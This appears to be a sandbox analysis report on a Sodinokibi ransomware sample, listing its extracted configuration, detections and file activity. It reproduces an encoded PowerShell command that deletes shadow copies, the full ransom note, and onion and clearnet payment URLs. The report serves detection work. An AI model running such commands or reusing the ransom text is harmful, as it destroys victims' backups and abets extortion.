AAgAGcAZQB0AHQAaQBuAGcAIABiAGUAbgBlAGYAaQB0AHMALgAgAEkAZgAgAHcAZQAgAGQAbwAgAG4AbwB0ACAAZABvACAAbwB1AHIAIAB3AG8AcgBrACAAYQBuAGQAIABsAGkAYQBiAGkAbABpAHQAaQBlAHMAIAAtACAAbgBvAGIAbwBkAHkAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIAB1AHMALgAgAEkAdABzACAAbgBvAHQAIABpAG4AIABvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzAC4ADQAKAFQAbwAgAGMAaABlAGMAawAgAHQAaABlACAAYQBiAGkAbABpAHQAeQAgAG8AZgAgAHIAZQB0AHUAcgBuAGkAbgBnACAAZgBpAGwAZQBzACwAIABZAG8AdQAgAHMAaABvAHUAbABkACAAZwBvACAAdABvACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlAC4AIABUAGgAZQByAGUAIAB5AG8AdQAgAGMAYQBuACAAZABlAGMAcgB5AHAAdAAgAG8AbgBlACAAZgBpAGwAZQAgAGYAbwByACAAZgByAGUAZQAuACAAVABoAGEAdAAgAGkAcwAgAG8AdQByACAAZwB1AGEAcgBhAG4AdABlAGUALgANAAoASQBmACAAeQBvAHUAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIABvAHUAcgAgAHMAZQByAHYAaQBjAGUAIAAtACAAZgBvAHIAIAB1AHMALAAgAGkAdABzACAAZABvAGUAcwAgAG4AbwB0ACAAbQBhAHQAdABlAHIALgAgAEIAdQB0ACAAeQBvAHUAIAB3AGkAbABsACAAbABvAHMAZQAgAHkAbwB1AHIAIAB0AGkAbQBlACAAYQBuAGQAIABkAGEAdABhACwAIABjAGEAdQBzAGUAIABqAHUAcwB0ACAAdwBlACAAaABhAHYAZQAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5AC4AIABJAG4AIABwAHIAYQBjAHQAaQBjAGUAIAAtACAAdABpAG0AZQAgAGkAcwAgAG0AdQBjAGgAIABtAG8AcgBlACAAdgBhAGwAdQBhAGIAbABlACAAdABoAGEAbgAgAG0AbwBuAGUAeQAuAA0ACgANAAoAWwArAF0AIABIAG8AdwAgAHQAbwAgAGcAZQB0ACAAYQBjAGMAZQBzAHMAIABvAG4AIAB3AGUAYgBzAGkAdABlAD8AIABbACsAXQANAAoADQAKAFkAbwB1ACAAaABhAHYAZQAgAHQAdwBvACAAdwBhAHkAcwA6AA0ACgANAAoAMQApACAAWwBSAGUAYwBvAG0AbQBlAG4AZABlAGQAXQAgAFUAcwBpAG4AZwAgAGEAIABUAE8AUgAgAGIAcgBvAHcAcwBlAHIAIQANAAoAIAAgAGEAKQAgAEQAbwB3AG4AbABvAGEAZAAgAGEAbgBkACAAaQBuAHMAdABhAGwAbAAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAgAGYAcgBvAG0AIAB0AGgAaQBzACAAcwBpAHQAZQA6ACAAaAB0AHQAcABzADoALwAvAHQAbwByAHAAcgBvAGoAZQBjAHQALgBvAHIAZwAvAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBhAHAAbABlAGIAegB1ADQANwB3AGcAYQB6AGEAcABkAHEAawBzADYAdgByAGMAdgA2AHoAYwBuAGoAcABwAGsAYgB4AGIAcgA2AHcAawBlAHQAZgA1ADYAbgBmADYAYQBxADIAbgBtAHkAbwB5AGQALgBvAG4AaQBvAG4ALwB7AFUASQBEAH0ADQAKAA0ACgAyACkAIABJAGYAIABUAE8AUgAgAGIAbABvAGMAawBlAGQAIABpAG4AIAB5AG8AdQByACAAYwBvAHUAbgB0AHIAeQAsACAAdAByAHkAIAB0AG8AIAB1AHMAZQAgAFYAUABOACEAIABCAHUAdAAgAHkAbwB1ACAAYwBhAG4AIAB1AHMAZQAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlAC4AIABGAG8AcgAgAHQAaABpAHMAOgANAAoAIAAgAGEAKQAgAE8AcABlAG4AIAB5AG8AdQByACAAYQBuAHkAIABiAHIAbwB3AHMAZQByACAAKABDAGgAcgBvAG0AZQAsACAARgBpAHIAZQBmAG8AeAAsACAATwBwAGUAcgBhACwAIABJAEUALAAgAEUAZABnAGUAKQANAAoAIAAgAGIAKQAgAE8AcABlAG4AIABvAHUAcgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBkAGUAYwByAHkAcAB0AG8AcgAuAGMAYwAvAHsAVQBJAEQAfQANAAoADQAKAFcAYQByAG4AaQBuAGcAOgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQAgAGMAYQBuACAAYgBlACAAYgBsAG8AYwBrAGUAZAAsACAAdABoAGEAdABzACAAdwBoAHkAIABmAGkAcgBzAHQAIAB2AGEAcgBpAGEAbgB0ACAAbQB1AGMAaAAgAGIAZQB0AHQAZQByACAAYQBuAGQAIABtAG8AcgBlACAAYQB2AGEAaQBsAGEAYgBsAGUALgANAAoADQAKAFcAaABlAG4AIAB5AG8AdQAgAG8AcABlAG4AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALAAgAHAAdQB0ACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAGQAYQB0AGEAIABpAG4AIAB0AGgAZQAgAGkAbgBwAHUAdAAgAGYAbwByAG0AOgANAAoASwBlAHkAOgANAAoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAA0ACgANAAoAIQAhACEAIABEAEEATgBHAEUAUgAgACEAIQAhAA0ACgBEAE8ATgBUACAAdAByAHkAIAB0AG8AIABjAGgAYQBuAGcAZQAgAGYAaQBsAGUAcwAgAGIAeQAgAHkAbwB1AHIAcwBlAGwAZgAsACAARABPAE4AVAAgAHUAcwBlACAAYQBuAHkAIAB0AGgAaQByAGQAIABwAGEAcgB0AHkAIABzAG8AZgB0AHcAYQByAGUAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACAAeQBvAHUAcgAgAGQAYQB0AGEAIABvAHIAIABhAG4AdABpAHYAaQByAHUAcwAgAHMAbwBsAHUAdABpAG8AbgBzACAALQAgAGkAdABzACAAbQBhAHkAIABlAG4AdABhAGkAbAAgAGQAYQBtAGEAZwBlACAAbwBmACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABhAG4AZAAsACAAYQBzACAAcgBlAHMAdQBsAHQALAAgAFQAaABlACAATABvAHMAcwAgAGEAbABsACAAZABhAHQAYQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEADQAKAE8ATgBFACAATQBPAFIARQAgAFQASQBNAEUAOgAgAEkAdABzACAAaQBuACAAeQBvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzACAAdABvACAAZwBlAHQAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYgBhAGMAawAuACAARgByAG8AbQAgAG8AdQByACAAcwBpAGQAZQAsACAAdwBlACAAKAB0AGgAZQAgAGIAZQBzAHQAIABzAHAAZQBjAGkAYQBsAGkAcwB0AHMAKQAgAG0AYQBrAGUAIABlAHYAZQByAHkAdABoAGkAbgBnACAAZgBvAHIAIAByAGUAcwB0AG8AcgBpAG4AZwAsACAAYgB1AHQAIABwAGwAZQBhAHMAZQAgAHMAaABvAHUAbABkACAAbgBvAHQAIABpAG4AdABlAHIAZgBlAHIAZQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEAAAA=", "et": 1, "wipe": false, "wfld": ["backup"], "nname": "{EXT}-readme.txt", "pk": "U1v/e5rsm+MBAyMWauKbSQoNySoEV1oLxrYMgzIi4SI=", "net": false, "exp": false, "arn": false}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.420567524.0000000002FFF000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
    00000000.00000003.420475668.0000000002FFF000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
      Process Memory Space: F73BkMlJhw.exe PID: 3756JoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Delete Shadow Copy Via PowershellShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, CommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\F73BkMlJhw.exe' , ParentImage: C:\Users\user\Desktop\F73BkMlJhw.exe, ParentProcessId: 3756, ProcessCommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, ProcessId: 4700

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: F73BkMlJhw.exeAvira: detected
        Found malware configurationShow sources
        Source: F73BkMlJhw.exe.3756.0.memstrMalware Configuration Extractor: Sodinokibi {"prc": [], "sub": "4920", "svc": [], "wht": {"ext": ["theme", "sys", "lnk", "deskthemepack", "dll", "drv", "scr", "spl", "ocx", "cpl", "ps1", "cur", "shs", "rom", "wpx", "msstyles", "bin", "msu", "rtp", "themepack", "msi", "cab", "nls", "nomedia", "ico", "386", "lock", "idx", "key", "msp", "icns", "ani", "hlp", "prf", "cmd", "bat", "diagcab", "adv", "hta", "diagpkg", "icl", "mod", "ics", "diagcfg", "mpa", "com", "msc", "exe"], "fls": ["ntuser.dat", "thumbs.db", "desktop.ini", "ntldr", "bootfont.bin", "ntuser.ini", "ntuser.dat.log", "iconcache.db", "autorun.inf", "bootsect.bak", "boot.ini"], "fld": ["programdata", "$windows.~ws", "windows.old", "$windows.~bt", "mozilla", "boot", "intel", "program files (x86)", "tor browser", "application data", "program files", "$recycle.bin", "google", "appdata", "system volume information", "perflogs", "msocache"]}, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": "rerekatu.com;comarenterprises.com;lapmangfpt.info.vn;tradiematepro.com.au;copystar.co.uk;mountaintoptinyhomes.com;woodleyacademy.org;thefixhut.com;architecturalfiberglass.org;triactis.com;ncs-graphic-studio.com;rehabilitationcentersinhouston.net;denifl-consulting.at;gymnasedumanagement.com;makeitcount.at;kidbucketlist.com.au;hvccfloorcare.com;ventti.com.ar;elimchan.com;fransespiegels.nl;chrissieperry.com;kaliber.co.jp;101gowrie.com;southeasternacademyofprosthodontics.org;bastutunnan.se;monark.com;pivoineetc.fr;americafirstcommittee.org;hypozentrum.com;digi-talents.com;xn--fn-kka.no;wmiadmin.com;wsoil.com.sg;tips.technology;ftlc.es;ivfminiua.com;tongdaifpthaiphong.net;destinationclients.fr;urist-bogatyr.ru;bockamp.com;huehnerauge-entfernen.de;villa-marrakesch.de;lillegrandpalais.com;lachofikschiet.nl;psc.de;huissier-creteil.com;easytrans.com.au;montrium.com;ruralarcoiris.com;transportesycementoshidalgo.es;fotoideaymedia.es;sexandfessenjoon.wordpress.com;space.ua;baronloan.org;courteney-cox.net;zweerscreatives.nl;qlog.de;sterlingessay.com;xlarge.at;houseofplus.com;bodyfulls.com;slwgs.org;spectrmash.ru;dontpassthepepper.com;botanicinnovations.com;luckypatcher-apkz.com;35-40konkatsu.net;remcakram.com;gw2guilds.org;harveybp.com;live-con-arte.de;gasbarre.com;macabaneaupaysflechois.com;praxis-management-plus.de;bildungsunderlebnis.haus;minipara.com;schraven.de;deepsouthclothingcompany.com;oslomf.no;iqbalscientific.com;reddysbakery.com;cyntox.com;associacioesportivapolitg.cat;tomoiyuma.com;iyengaryogacharlotte.com;lukeshepley.wordpress.com;figura.team;selfoutlet.com;broseller.com;nhadatcanho247.com;katiekerr.co.uk;mirkoreisser.de;ora-it.de;asteriag.com;ussmontanacommittee.us;sairaku.net;bee4win.com;kindersitze-vergleich.de;licor43.de;irinaverwer.com;launchhubl.com;antiaginghealthbenefits.com;homecomingstudio.com;latestmodsapks.com;mmgdouai.fr;planchaavapor.net;12sta
        Multi AV Scanner detection for submitted fileShow sources
        Source: F73BkMlJhw.exeVirustotal: Detection: 68%Perma Link
        Source: F73BkMlJhw.exeReversingLabs: Detection: 79%
        Machine Learning detection for sampleShow sources
        Source: F73BkMlJhw.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00095086 CryptAcquireContextW,CryptGenRandom,0_2_00095086
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000959CD CryptBinaryToStringW,CryptBinaryToStringW,0_2_000959CD
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009596C CryptStringToBinaryW,CryptStringToBinaryW,0_2_0009596C
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: d:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: e:Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000970C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_000970C1

        Networking:

        barindex
        Found Tor onion addressShow sources
        Source: F73BkMlJhw.exe, 00000000.00000003.693925894.000000000300A000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F78E6169B25D34D5
        Source: F73BkMlJhw.exe, 00000000.00000003.420484795.0000000003008000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
        Source: 3zvp3joi3-readme.txt64.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F78E6169B25D34D5
        Source: F73BkMlJhw.exe, 00000000.00000003.420484795.0000000003008000.00000004.00000040.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
        Source: F73BkMlJhw.exe, 00000000.00000003.693925894.000000000300A000.00000004.00000040.sdmp, 3zvp3joi3-readme.txt64.0.drString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F78E6169B25D34D5
        Source: F73BkMlJhw.exe, 00000000.00000003.420484795.0000000003008000.00000004.00000040.sdmpString found in binary or memory: http://decryptor.cc/
        Source: F73BkMlJhw.exe, 00000000.00000003.693925894.000000000300A000.00000004.00000040.sdmp, 3zvp3joi3-readme.txt64.0.drString found in binary or memory: http://decryptor.cc/F78E6169B25D34D5
        Source: F73BkMlJhw.exe, 00000000.00000003.693925894.000000000300A000.00000004.00000040.sdmp, 3zvp3joi3-readme.txt64.0.drString found in binary or memory: https://torproject.org/

        Spam, unwanted Advertisements and Ransom Demands:

        barindex
        Found ransom note / readmeShow sources
        Source: C:\3zvp3joi3-readme.txtDropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3zvp3joi3.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F78E6169B25D34D52) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F78E6169B25D34D5Warning: secondary website can be blocked, thats why first variant muchJump to dropped file
        Yara detected Sodinokibi RansomwareShow sources
        Source: Yara matchFile source: 00000000.00000003.420567524.0000000002FFF000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.420475668.0000000002FFF000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: F73BkMlJhw.exe PID: 3756, type: MEMORY
        Contains functionalty to change the wallpaperShow sources
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009419B GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,0_2_0009419B
        Modifies existing user documents (likely ransomware behavior)Show sources
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile moved: C:\Users\user\Desktop\MNULNCRIYC.docxJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile deleted: C:\Users\user\Desktop\MNULNCRIYC.docxJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile moved: C:\Users\user\Desktop\DTBZGIOOSO.xlsxJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile deleted: C:\Users\user\Desktop\DTBZGIOOSO.xlsxJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile moved: C:\Users\user\Desktop\XZXHAVGRAG.pdfJump to behavior

        System Summary:

        barindex
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00093839 OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_00093839
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009B1B10_2_0009B1B1
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000985070_2_00098507
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009A51C0_2_0009A51C
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00097D860_2_00097D86
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00097FE40_2_00097FE4
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs F73BkMlJhw.exe
        Source: classification engineClassification label: mal100.rans.evad.winEXE@5/209@0/0
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000948DE GetDriveTypeW,GetDiskFreeSpaceExW,0_2_000948DE
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009500F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_0009500F
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\program files\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_01
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeMutant created: \Sessions\1\BaseNamedObjects\Global\B6CC837D-86BE-A32B-F1A9-2E0B99BA279D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzeglomx.3eq.ps1Jump to behavior
        Source: F73BkMlJhw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: F73BkMlJhw.exeVirustotal: Detection: 68%
        Source: F73BkMlJhw.exeReversingLabs: Detection: 79%
        Source: unknownProcess created: C:\Users\user\Desktop\F73BkMlJhw.exe 'C:\Users\user\Desktop\F73BkMlJhw.exe'
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Source: unknownProcess created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeDirectory created: c:\program files\3zvp3joi3-readme.txtJump to behavior
        Source: F73BkMlJhw.exeStatic PE information: section name: .i6x
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: C:\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\program files\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\program files (x86)\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\recovery\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\jay jay hammer\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\desktop\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\documents\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\downloads\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\favorites\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\links\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\music\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\pictures\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\saved games\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\default\videos\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\accountpictures\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\desktop\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\documents\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\downloads\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\libraries\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\music\3zvp3joi3-readme.txtJump to behavior
